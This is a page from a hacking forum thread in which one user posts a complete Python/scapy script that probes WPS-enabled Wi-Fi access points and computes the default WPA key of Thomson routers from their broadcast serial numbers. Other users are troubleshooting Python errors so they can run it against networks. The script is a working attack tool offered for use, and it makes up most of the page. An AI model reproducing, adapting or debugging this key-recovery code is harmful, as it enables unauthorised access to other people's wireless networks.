Page 4 of 4 FirstFirst ... 234
Results 31 to 35 of 35

Thread: What can someone do after discovering a "exploit"?

  1. #31
    Just burned their ISO
    Join Date
    Sep 2012
    Posts
    7

    Default

    Thanks Snayler.
    I'm sorry to disturb you again but I'm really new at this.
    I have backtrack 5r3 on usb.
    Then I go to http://www.pastebin.ca/2110985.
    How do I download it?
    Then I use all that codes.
    Finally use mon0 and all that stuff. And I'm good to go?

    Finally I put it to work thanks
    Last edited by g0tmi1k; 12-11-2012 at 02:14 PM. Reason: Merged

  2. #32
    Just burned their ISO
    Join Date
    Jul 2010
    Posts
    23

    Default Re: What can someone do after discovering a "exploit"?

    I had download wps tools from sourcesec, cp both files to /usr/bin and made it executables, when I try to run wpscan with any of the available option I get the following error from python:

    Code:
    Traceback (most recent call last):
      File "/usr/bin/wpscan", line 323, in <module>
        main()
      File "/usr/bin/wpscan", line 314, in main
        wps = WPSQuery(iface,pfile)
      File "/usr/bin/wpscan", line 44, in __init__
        conf.iface = iface
    
    Caught exception while running sniff(): global name 'sniff' is not defined
    What version o python do I need to have? I notice
    /usr/bin/env python
    At the top of the scrip - is this why am I getting the error running the scrip,
    something missing in python or version?

    I also try to run ssid2key.py and since I don’t have python 2.5 I get:

    Code:
    /usr/bin/python^M: bad interpreter: No such file or directory
    Can I install python 2.5 without breaking anything - just cautious about python in general

    Running BT5-R3 KDE on vmware

    Thanks for your help

  3. #33
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    @airwolf3000: You'll need to install python-scapy, I forgot to mention that.
    Btw, pastebin seems down, here's the altered wpscan:
    Code:
    #!/usr/bin/env python
    
    from sys import argv, stderr, exit
    from getopt import GetoptError, getopt as GetOpt
    import hashlib
    
    try:
    	from scapy.all import *
    except Exception, e:
    	print 'Failed to import scapy:',e
    	exit(1)
    
    def ascii2hex(char):
           	return hex(ord(char))[2:]
    
    def serial2key(serial):
    	#print 'Key for Serial Number: CP%s' % serial
    	sn = 'CP%s%s%s%s' % (serial[0:4],ascii2hex(serial[6]),ascii2hex(serial[7]),ascii2hex(serial[8]))
    	hash = hashlib.sha1(sn.upper()).hexdigest()
    	return hash[0:10].upper()
    
    
    class WPSQuery:
    	bssid = None
    	essid = None
    	pfile = None
    	rprobe = False
    	verbose = False
    	probedNets = {}
    	WPS_ID = "\x00\x50\xF2\x04"
    	wps_attributes = {
    			0x104A : {'name' : 'Version                          ', 'type' : 'hex'},
    			0x1044 : {'name' : 'WPS State                        ', 'type' : 'hex'},
    			0x1057 : {'name' : 'AP Setup Locked                  ', 'type' : 'hex'},
    			0x1041 : {'name' : 'Selected Registrar               ', 'type' : 'hex'},
    			0x1012 : {'name' : 'Device Password ID               ', 'type' : 'hex'},
    			0x1053 : {'name' : 'Selected Registrar Config Methods', 'type' : 'hex'},
    			0x103B : {'name' : 'Response Type                    ', 'type' : 'hex'},
    			0x1047 : {'name' : 'UUID-E                           ', 'type' : 'hex'},
    			0x1021 : {'name' : 'Manufacturer                     ', 'type' : 'str'},
    			0x1023 : {'name' : 'Model Name                       ', 'type' : 'str'},
    			0x1024 : {'name' : 'Model Number                     ', 'type' : 'str'},
    			0x1042 : {'name' : 'Serial Number                    ', 'type' : 'str'},
    			0x1054 : {'name' : 'Primary Device Type              ', 'type' : 'hex'},
    			0x1011 : {'name' : 'Device Name                      ', 'type' : 'str'},
    			0x1008 : {'name' : 'Config Methods                   ', 'type' : 'hex'},
    			0x103C : {'name' : 'RF Bands                         ', 'type' : 'hex'},
    			0x1045 : {'name' : 'SSID                             ', 'type' : 'str'},
    			0x102D : {'name' : 'OS Version                       ', 'type' : 'str'}
    	}
    
    
    	def __init__(self,iface,pfile):
    		if iface:
    			conf.iface = iface
    		if pfile:
    			self.pfile = pfile
    
    	def run(self):
    		if self.verbose:
    			if self.pfile:
    				stderr.write("Reading packets from %s\n\n" % self.pfile)
    			else:
    				stderr.write("Listening on interface %s\n\n" % conf.iface)
    
    		try:
    			sniff(prn=self.pcap,offline=self.pfile)
    		except Exception, e:
    			print 'Caught exception while running sniff():',e
    
    	#Handles captured packets
    	def pcap(self,packet):
    		if packet.haslayer(Dot11Beacon):
    			self.beaconh(packet)
    		elif packet.haslayer(Dot11ProbeResp):
    			self.responseh(packet)
    
    	#Beacon packet handler
    	def beaconh(self,pkt):
    		elt = None
    		eltcount = 1
    		doprobe = False
    		essid = None
    		bssid = pkt[Dot11].addr3.upper()
    
    		#If a specific BSSID and ESSID combination was supplied, skip everything else and just probe it
    		if self.bssid and self.essid:
    			self.probereq(self.essid,self.bssid)
    			return
    
    		#If we've already probed it, processing it's beacon frames won't do us any more good
    		if self.probedNets.has_key(bssid):
    			return
    
    		#Is this the BSSID we're looking for?
    		if self.bssid and self.bssid != bssid:
    			return
    
    		#Loop through all information elements	
    		while elt != pkt.lastlayer(Dot11Elt):
                    	elt = pkt.getlayer(Dot11Elt, nb=eltcount)
    			eltcount += 1
    
                            #Get the SSID
                            if elt.ID == 0:
                            	essid = elt.info
                            	#Skip if this is not the SSID we're looking for
                            	if self.essid and essid != self.essid:
                            		return
    
    			#Check for a WPS information element
    			else:
    				doprobe = self.iswpselt(elt)
    				if doprobe:
    					if self.verbose:
    						stderr.write("WPS support detected for %s (%s)\n" % (bssid,essid))
    					break
    
    		#Should we actively probe this AP?
    		if doprobe == True or self.rprobe == True:
    			self.probereq(essid,bssid)
    		return
    
    	#Probe response packet handler
    	def responseh(self,pkt):
    		wpsdata = []
    		eltcount = 1
    		elt = None
    		bssid = None
    		essid = None
    		bssid = pkt[Dot11].addr3.upper()
    
                    #Is this the BSSID we're looking for?
                    if self.bssid and self.bssid != bssid:
                            return
    
                    #Loop through all information elements 
                    while elt != pkt.lastlayer(Dot11Elt):
                            elt = pkt.getlayer(Dot11Elt, nb=eltcount)
    			eltcount += 1
    
                            #Get the SSID
                            if elt.ID == 0:
                                    essid = elt.info
    				#Don't probe a network multiple times
    				if essid != None and self.probedNets.has_key(bssid) and self.probedNets[bssid] == essid:
    					return
                                    #Skip if this is not the SSID we're looking for
                                    if self.essid and essid != self.essid:
                                            return
    				if self.verbose:
    					stderr.write("Received probe response from %s (%s)\n" % (bssid,essid))
    			elif self.iswpselt(elt):
    				wpsdata = self.parsewpselt(elt)
    
    		#Display WPS information
    		if wpsdata:
    			self.printwpsinfo(wpsdata,bssid,essid)
    		elif self.verbose:
    			stderr.write("No WPS element supplied by %s (%s)!\n" % (bssid,essid))
    
    		#Mark this BSSID as complete
    		self.probedNets[bssid] = essid
    
    		return
    		
    	#Display collected WPS data
    	def printwpsinfo(self,wpsdata,bssid,essid):
    		textlen = 33
    		filler = ' '
    		is_valid = 0
    
    		if wpsdata:
    			print ''
    			print 'BSSID:',bssid
                            print 'ESSID:',essid
                            print '----------------------------------------------------------'
    
                            for (header,data,datatype) in wpsdata:
    				if datatype != 'str':
    					tdata = data
    					data = '0x'
    					for i in tdata:
    						byte = str(hex(ord(i)))[2:]
    						if len(byte) == 1:
    							byte = '0' + byte
    						data += byte
    				header = header + (filler * (textlen-len(header)))
                                    print '%s : %s' % (header,data)
    				if data == 'THOMSON':
    					is_valid = 1
    				elif data == '784n':
    					is_valid = 0
    				if header == 'Serial Number                    ':
    				   	header = 'DEFAULT KEY                      '
    					if is_valid == 1:
    						data = serial2key(data)
    					else:
    						data = 'UNSUPPORTED'
    					
                                    	print '%s : %s' % (header,data)
                            print ''
    
    	
    	#Send a probe request to the specified AP
    	def probereq(self,essid,bssid):
    		if not essid or not bssid:
    			return
    		if self.probedNets.has_key(bssid):
    			return
    		if self.pfile:
    			return
    
    		if self.verbose:
    			stderr.write("Probing network '%s (%s)'\n" % (bssid,essid))
    
    		try:
    			#Build a probe request packet with a SSID and a WPS information element
                            dst = mac2str(bssid)
                            src = mac2str("ff:ff:ff:ff:ff:ff")
                            packet = Dot11(addr1=dst,addr2=src,addr3=dst)/Dot11ProbeReq()
                            packet = packet/Dot11Elt(ID=0,len=len(essid),info=essid)/Dot11Elt(ID=221,len=9,info="%s\x10\x4a\x00\x01\x10" % self.WPS_ID)
    			
    			#Send it!
    			send(packet,verbose=0)
    			self.probedNets[bssid] = None
    		except Exception, e:
    			print 'Failure sending probe request to',essid,':',e
    
    
    	#Check if an element is a WPS element
    	def iswpselt(self,elt):
    		if elt.ID == 221:
                    	if elt.info.startswith(self.WPS_ID):
                            	return True
    		return False
    
    	
    	#Parse a WPS element
    	def parsewpselt(self,elt):
    		data = []
    		tagname = None
    		tagdata = None
    		datatype = None
    		tag = 0
    		tlen = 0
    		i = len(self.WPS_ID)
    
    		try:
    			if self.iswpselt(elt):
    				while i < elt.len:
    					#Get tag number and length
    					tag = int((ord(elt.info[i]) * 0x100) + ord(elt.info[i+1]))
    					i += 2
    					tlen = int((ord(elt.info[i]) * 0x100) + ord(elt.info[i+1]))
    					i += 2
    
    					#Get the tag data
    					tagdata = elt.info[i:i+tlen]
    					i += tlen
    			
    					#Lookup the tag name and type
    					try:
    						tagname = self.wps_attributes[tag]['name']
    						datatype = self.wps_attributes[tag]['type']
    					except Exception, e:
    						tagname = 'Unknown'
    						datatype = 'hex'
    
    					#Append to array
    					data.append((tagname,tagdata,datatype))
    		except Exception,e:
    			print 'Exception processing WPS element:',e 
    
    		return data
    
    def about():
    	print '''
    WPScan actively scans access points that support WiFi Protected Setup by sending
    802.11 probe requests to them. It then examines the WPS information element in the
    resulting 802.11 probe response and displays the information contained in that IE.
    
    This is useful for fingerprinting WPS-capable access points, as many of them will
    include their vendor, model number, and firmware versions in the WPS IE of the 
    probe response.
    '''
    	exit(0)
    	
    def usage():
    	print '''
    Usage: %s [OPTIONS]
    
    	-i <iface>	Specify the interface to listen on
    	-p <file>	Specify pcap file to read from
    	-b <bssid>	Specify a bssid filter
    	-e <essid>	Specify an essid filter
    	-n		Probe all networks
    	-v		Enable verbose mode
    	-a		Show about information
    	-h		Show help
    ''' % argv[0]
    	exit(1)
    
    
    def main():
    	bssid = None
    	essid = None
    	iface = None
    	pfile = None
    	probeall = False
    	verbose = False
    
    	try:
    		opts,args = GetOpt(argv[1:],"b:e:i:p:ainvh");
    	except GetoptError, e:
    		print 'Usage Error:',e
    		usage()
    
    	for opt,optarg in opts:
    		if opt == '-b':
    			bssid = optarg.upper()
    		elif opt == '-e':
    			essid = optarg
    		elif opt == '-i':
    			iface = optarg
    		elif opt == '-p':
    			pfile = optarg
    		elif opt == '-v':
    			verbose = True
    		elif opt == '-n':
    			probeall = True
    		elif opt == '-a':
    			about()
    		else:
    			usage()
    
    		
    	wps = WPSQuery(iface,pfile)
    	wps.bssid = bssid
    	wps.essid = essid
    	wps.rprobe = probeall
    	wps.verbose = verbose
    	wps.run()
    
    
    if __name__ == "__main__":
    	main()
    Last edited by Snayler; 10-08-2012 at 06:19 AM.

  4. #34
    Just burned their ISO
    Join Date
    Jul 2010
    Posts
    23

    Default Re: What can someone do after discovering a "exploit"?

    Thanks Snayler, I will made the adjustments and give it a go

  5. #35
    Just burned their ISO
    Join Date
    Jul 2010
    Posts
    23

    Default Re: What can someone do after discovering a "exploit"?

    issue with /usr/bin/env python

    Code:
    root@bt:~# wpscan -i mon0 -b xx:xx:x:0xx:4x:Dx -e xxxxIK -v
    /usr/bin/wpscan: line 1: #!/usr/bin/env: No such file or directory
    : command not foundne 2: 
    from: can't read /var/mail/sys
    from: can't read /var/mail/getopt
    I had install scapy-2.2.0 - try to upgrade python, now I'm getting a different error.

    Is there a particular version of Python that this particular script run on?
    I know there is a big difference between V.2 and V.3, the output of the script are very different.

    After checking, there is no such file in /usr/bin, I had check many sources before posting and there is no such file in usr/local/bin,either, just in case that the path need it to be change.

    What am I doing wrong Snayler?

    10Q

Page 4 of 4 FirstFirst ... 234

Similar Threads

  1. Replies: 5
    Last Post: 03-26-2012, 11:42 AM
  2. Replies: 4
    Last Post: 02-24-2011, 04:52 PM
  3. Win2003 / R2 und exploit "ms08_067" Problem
    By Drake379 in forum Anfänger Ecke
    Replies: 3
    Last Post: 05-10-2010, 05:54 AM
  4. Video Demo "Vom POC zum Exploit SEH" by ozzy
    By ozzy66 in forum Tutorials und Howtos
    Replies: 5
    Last Post: 01-20-2010, 10:41 AM
  5. msfcli cannot load "listening" exploit?
    By bruk0ut in forum OLD BT4beta Bugs and Fixes
    Replies: 8
    Last Post: 03-10-2009, 07:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •